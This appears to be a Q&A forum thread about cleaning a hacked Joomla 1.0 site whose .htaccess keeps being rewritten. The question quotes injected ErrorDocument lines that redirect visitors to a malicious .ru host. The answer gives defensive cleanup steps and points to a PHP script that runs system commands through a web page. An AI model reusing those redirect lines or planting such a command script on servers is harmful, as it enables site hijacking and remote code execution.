Virus/malware modifying .htaccess on Joomla CMS website

Pinch picture Pinch · Mar 20, 2012 · Viewed 8.4k times · Source

I have a Joomla 1.0 website running on a shared host which I don't have shell access (only FTP available). Recently my website has been marked as malware site by Google and I notify that the .htaccess file is modified with malicious contents. These redirections rule to a website called 'depositpeter.ru' are added to the .htaccess:

ErrorDocument 400 http://depositpeter.ru/mnp/index.php
ErrorDocument 401 http://depositpeter.ru/mnp/index.php ...

If I clean this .htaccess file, it will be modified back with malicious contents a few minutes later.

I suspect there are some backdoor PHP and javascript has been injected to our codebase which constantly modifies the .htaccess file. However I have no idea how these malware landed on my site in the first place. I'm pretty sure that no FTP users have uploaded those to my site. A virus scan found that there is a user-uploaded image being injected with PHP.ShellExec malware (I'm not sure how this PHP.ShellExec work and if it is related to the .htaccess virus though).

My question is how should I start troubleshooting and cleaning this malware? I'm pretty clueless and have little experience dealing with web malware. Any help is greatly appreciate!

Answer

DCoder picture DCoder · Mar 20, 2012

It might be beyond your power to fix this yourself. But here are some things that you should do.

  • Download any apache/php logs you have - these can point to the security holes being exploited. If you can find the entries, make sure the holes are covered.
  • Remove the image that is indicated as infected.
  • Contact your host - several hosting companies have automated solutions to find and clean up common vulnerabilities. Also, if your site is infected, odds are, other clients on the same server are, too.
    • Conversely, it might be another client on the same server that's causing this problem for you.
  • Add an .htaccess file in the uploads directory that would prevent access to anything other than uploaded images. It might look something like this:

    Order deny,allow
    Deny from all
    <FilesMatch "\.(jpe?g|bmp|png)$">
    Allow from all
    </FilesMatch>

  • If your host hasn't blocked functions that allow php to invoke system commands (you'd be surprised) and you know what to do, you can mimic shell access with a custom php script using system, exec, popen and some other functions. I use a script I made myself: https://github.com/DCoderLT/Misc_Tools/blob/master/sh/sh.php . It's fairly primitive, but got the job done when I needed it to.

Future considerations:

  • Make backups. Your hosting company might provide these going back a certain period of time.
  • Keep an eye on the updates. Subscribe to the Joomla announcements mailing list. Apply these updates as quickly as you can. Popular applications like Joomla and WordPress are a frequent and easy target for script kiddies and automated bots.
  • Make backups.
  • Make sure your hosting company has the server set up properly, so that user A cannot affect user B's files (file permissions, suexec or similar). I don't know how common this is these days, but it used to be a frequent oversight in the past.
  • Make backups.
  • Don't leave write permissions enabled on files and folders that don't need it.
  • Make backups.